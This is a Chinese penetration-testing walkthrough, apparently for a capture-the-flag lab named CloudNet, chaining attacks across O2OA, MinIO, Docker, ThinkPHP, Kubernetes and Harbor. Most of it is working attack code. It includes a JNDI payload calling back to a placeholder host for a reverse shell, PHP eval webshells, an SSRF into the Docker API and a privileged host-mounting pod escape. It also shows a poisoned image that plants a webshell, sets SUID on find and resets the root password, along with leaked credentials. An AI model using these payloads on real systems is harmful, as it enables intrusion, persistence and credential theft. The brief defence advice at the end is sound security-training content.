CloudNet渗透测试实战教学文档<\/h1>

1. 目标环境概述<\/h2>
目标系统是一个包含多个组件的复杂网络环境，主要涉及以下服务：<\/p>
O2OA办公系统（8080端口）<\/li>
MinIO对象存储（9000端口）<\/li>
Harbor镜像仓库（80端口）<\/li>
Kubernetes集群（多个节点）<\/li>
医院内部平台（80端口）<\/li>
极致CMS系统<\/li> <\/ul>
2. 初始信息收集<\/h2>

2.1 端口扫描结果<\/h3>
39.99.148.11:25 open
39.99.148.11:110 open 
39.99.148.11:22 open
39.99.148.11:80 open
39.99.148.11:8080 open
<\/code><\/pre>
2.2 Web服务识别<\/h3>

http:\/\/39.99.148.11: 广城市人民医院<\/li>
http:\/\/39.99.148.11:8080: O2OA系统<\/li>
<\/ul>
3. Flag1获取：O2OA系统漏洞利用<\/h2>
3.1 O2OA漏洞利用<\/h3>
O2OA系统存在CNVD-2020-18740漏洞，允许远程命令执行。<\/p>
利用步骤：<\/strong><\/p>

使用默认凭证登录：xadmin\/o2oa@2022<\/li>
添加恶意接口代码：<\/li>
<\/ol>
var<\/span> a<\/span> =<\/span> mainOutput<\/span>();
<\/span><\/span>function<\/span> mainOutput<\/span>() {
<\/span><\/span>    var<\/span> aaa<\/span> =<\/span> Java<\/span>.type<\/span>("javax.naming.InitialContext"<\/span>);
<\/span><\/span>    aaa<\/span>.doLookup<\/span>("ldap:\/\/vpsip:1389\/Deserialization\/CommonsBeanutils1\/ReverseShell\/vpsip\/250"<\/span>);
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>
使用JNDIExploit工具监听：<\/li>
<\/ol>
java -jar JNDIExploit-2.0-SNAPSHOT.jar -l 1389<\/span> -p 8000<\/span> -i vpsip
<\/span><\/span><\/code><\/pre>3.2 获取凭证<\/h3>
在服务器配置文件中发现敏感信息：<\/p>
grep -r "password"<\/span> config
<\/span><\/span><\/code><\/pre>找到MinIO凭证：<\/p>
"username": "bxBZOXDlizzuujdR",
"password": "TGdtqwJbBrEMhCCMDVtlHKU="
<\/code><\/pre>
4. Flag2获取：MinIO利用<\/h2>
4.1 连接MinIO<\/h3>
使用获取的凭证连接MinIO服务：<\/p>
地址：172.22.18.29:9000
用户：bxBZOXDlizzuujdR
密码：TGdtqwJbBrEMhCCMDVtlHKU=
<\/code><\/pre>
4.2 上传WebShell<\/h3>

上传PHP webshell文件：<\/li>
<\/ol>
<?<\/span>php<\/span> eval<\/span>($_POST['chu0'<\/span>]);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
访问webshell获取flag：<\/li>
<\/ol>
http:\/\/39.98.108.142\/shell.php
<\/code><\/pre>
flag位于根目录。<\/p>
5. Flag3获取：Docker API SSRF漏洞利用<\/h2>
5.1 利用MinIO的SSRF漏洞<\/h3>
通过MinIO的SSRF漏洞访问Docker API（2375端口）。<\/p>
步骤：<\/strong><\/p>

创建恶意Dockerfile：<\/li>
<\/ol>
FROM<\/span> 172.22.18.64\/public\/mysql:5.6<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> echo IyEvdXNyL2Jpbi9lbnYgYmFzaAo... | base64 -d > \/tmp\/1.sh
<\/span><\/span><\/span><\/span>RUN<\/span> chmod +x \/tmp\/1.sh &&<\/span> \/tmp\/1.sh
<\/span><\/span><\/span><\/code><\/pre>
设置PHP重定向服务：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>('Location: http:\/\/127.0.0.1:2375\/build?remote=http:\/\/172.22.18.23\/Dockerfile&nocache=true&t=evil:1'<\/span>, false<\/span>, 307<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
通过MinIO的WebRPC接口触发SSRF：<\/li>
<\/ol>
POST<\/span> \/minio\/webrpc HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.22.18.23:8081<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "id"<\/span>: 1<\/span>,
<\/span><\/span>    "jsonrpc"<\/span>: "2.0"<\/span>,
<\/span><\/span>    "params"<\/span>: {
<\/span><\/span>        "token"<\/span>: "Test"<\/span>
<\/span><\/span>    },
<\/span><\/span>    "method"<\/span>: "web.LoginSTS"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. Flag4获取：极致CMS漏洞利用<\/h2>
6.1 利用ThinkPHP RCE漏洞<\/h3>
GET \/index.php?+config-create+\/&l=usr\/local\/lib\/php\/pearcmd&\/<?=eval($_POST[1]);?>+\/var\/www\/html\/shell1.php HTTP\/1.1
<\/code><\/pre>
6.2 获取数据库凭证<\/h3>
在配置文件中发现MySQL凭证：<\/p>
'db'<\/span> =><\/span> array<\/span> (
<\/span><\/span>    'host'<\/span> =><\/span> 'mysql'<\/span>,
<\/span><\/span>    'dbname'<\/span> =><\/span> 'jizhicms'<\/span>,
<\/span><\/span>    'username'<\/span> =><\/span> 'root'<\/span>,
<\/span><\/span>    'password'<\/span> =><\/span> 'Mysqlroot@!123'<\/span>,
<\/span><\/span>    'prefix'<\/span> =><\/span> 'jz_'<\/span>,
<\/span><\/span>    'port'<\/span> =><\/span> '3306'<\/span>
<\/span><\/span>),
<\/span><\/span><\/code><\/pre>6.3 获取Kubernetes Token<\/h3>
通过MySQL UDF提权后读取Kubernetes token：<\/p>
select<\/span> load_file("\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span>);
<\/span><\/span><\/code><\/pre>7. Flag5获取：Kubernetes Master节点控制<\/h2>
7.1 使用Token访问Dashboard<\/h3>
kubectl -s https:\/\/172.22.15.75:6443\/ --insecure-skip-tls-verify=true --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IlRSaDd3eFBhYXFNTkg5OUh0TnNwcW00c0Zpand4LUliXzNHRU1raXFjTzQifQ...
<\/code><\/pre>
7.2 创建特权Pod进行逃逸<\/h3>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: control-master-x<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  tolerations<\/span>:
<\/span><\/span>  - key<\/span>: node-role.kubernetes.io\/master<\/span>
<\/span><\/span>    operator<\/span>: Exists<\/span>
<\/span><\/span>    effect<\/span>: NoSchedule<\/span>
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - name<\/span>: control-master-x<\/span>
<\/span><\/span>    image<\/span>: 172.22.18.64<\/span>\/public\/mysql:5.6<\/span>
<\/span><\/span>    command<\/span>: ["\/bin\/sleep"<\/span>, "3650d"<\/span>]
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - name<\/span>: master<\/span>
<\/span><\/span>      mountPath<\/span>: \/tmp<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: master<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/<\/span>
<\/span><\/span>      type<\/span>: Directory<\/span>
<\/span><\/span><\/code><\/pre>8. Flag6获取：Kubernetes Node2节点<\/h2>
8.1 指定Pod到Node2节点<\/h3>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: control-master-x1<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  tolerations<\/span>:
<\/span><\/span>  - key<\/span>: node-role.kubernetes.io\/master<\/span>
<\/span><\/span>    operator<\/span>: Exists<\/span>
<\/span><\/span>    effect<\/span>: NoSchedule<\/span>
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - name<\/span>: control-master-x<\/span>
<\/span><\/span>    image<\/span>: 172.22.18.64<\/span>\/public\/mysql:5.6<\/span>
<\/span><\/span>    command<\/span>: ["\/bin\/sleep"<\/span>, "3650d"<\/span>]
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - name<\/span>: master<\/span>
<\/span><\/span>      mountPath<\/span>: \/tmp<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: master<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/<\/span>
<\/span><\/span>      type<\/span>: Directory<\/span>
<\/span><\/span>  nodeSelector<\/span>:
<\/span><\/span>    kubernetes.io\/hostname<\/span>: node2<\/span>
<\/span><\/span><\/code><\/pre>9. Flag7获取：Harbor镜像仓库<\/h2>
9.1 获取Harbor凭证<\/h3>
kubectl get secret harbor-registry-secret -o jsonpath=<\/span>'{.data.\.dockerconfigjson}'<\/span> | base64 --decode
<\/span><\/span><\/code><\/pre>输出：<\/p>
{
<\/span><\/span>  "auths"<\/span>: {
<\/span><\/span>    "172.22.18.64"<\/span>: {
<\/span><\/span>      "username"<\/span>: "admin"<\/span>,
<\/span><\/span>      "password"<\/span>: "password@nk9DLwqce"<\/span>,
<\/span><\/span>      "auth"<\/span>: "YWRtaW46cGFzc3dvcmRAbms5REx3cWNl"<\/span>
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>9.2 拉取flag镜像<\/h3>
docker login 172.22.18.64
<\/span><\/span>docker pull 172.22.18.64\/hospital\/flag:latest
<\/span><\/span>docker run -id --name flag 172.22.18.64\/hospital\/flag
<\/span><\/span>docker exec -it flag \/bin\/bash
<\/span><\/span>cat \/flag
<\/span><\/span><\/code><\/pre>10. Flag8获取：镜像替换攻击<\/h2>
10.1 构建恶意镜像<\/h3>
Dockerfile内容：<\/p>
FROM<\/span> 172.22.18.64\/hospital\/system<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> echo ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k | base64 -d | bash &&<\/span> echo password | echo ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA==<\/span> | base64 -d | bash
<\/span><\/span><\/span><\/span>ENTRYPOINT<\/span> ["\/usr\/sbin\/apache2ctl"<\/span>, "-D"<\/span>, "FOREGROUND"<\/span>]
<\/span><\/span><\/span><\/code><\/pre>10.2 上传并等待自动拉取<\/h3>

构建并推送镜像：<\/li>
<\/ol>
docker build -t 172.22.18.64\/hospital\/system .
<\/span><\/span>docker push 172.22.18.64\/hospital\/system
<\/span><\/span><\/code><\/pre>
等待约20分钟让系统自动拉取新镜像<\/li>
<\/ol>
10.3 获取shell<\/h3>

访问webshell：<\/li>
<\/ol>
http:\/\/172.22.50.45\/shell.php
<\/code><\/pre>

使用find命令反弹shell：<\/li>
<\/ol>
\/usr\/bin\/find .\/ -exec .\/1.sh \;<\/span>
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>

O2OA漏洞利用<\/strong>：CNVD-2020-18740漏洞允许通过LDAP注入实现RCE<\/li>
MinIO利用<\/strong>：通过配置文件中泄露的凭证访问对象存储<\/li>
SSRF到Docker API<\/strong>：利用MinIO的SSRF漏洞访问内网Docker API<\/li>
ThinkPHP RCE<\/strong>：通过pearcmd.php实现任意文件写入<\/li>
Kubernetes横向移动<\/strong>：

通过Service Account Token访问集群<\/li>
使用特权容器实现节点逃逸<\/li>
通过nodeSelector定位特定节点<\/li>
<\/ul>
<\/li>
Harbor镜像替换攻击<\/strong>：通过更新自动拉取的镜像实现持久化访问<\/li>
容器逃逸技术<\/strong>：

特权容器挂载主机根目录<\/li>
利用find命令执行反弹shell<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

及时更新O2OA等系统到最新版本<\/li>
限制Docker API的访问，禁用2375端口的公开访问<\/li>
加强Service Account权限管理<\/li>
避免在配置文件中硬编码敏感信息<\/li>
实施镜像签名验证，防止恶意镜像替换<\/li>
限制容器的特权模式使用<\/li>
加强网络隔离，防止内网横向移动<\/li>
<\/ol>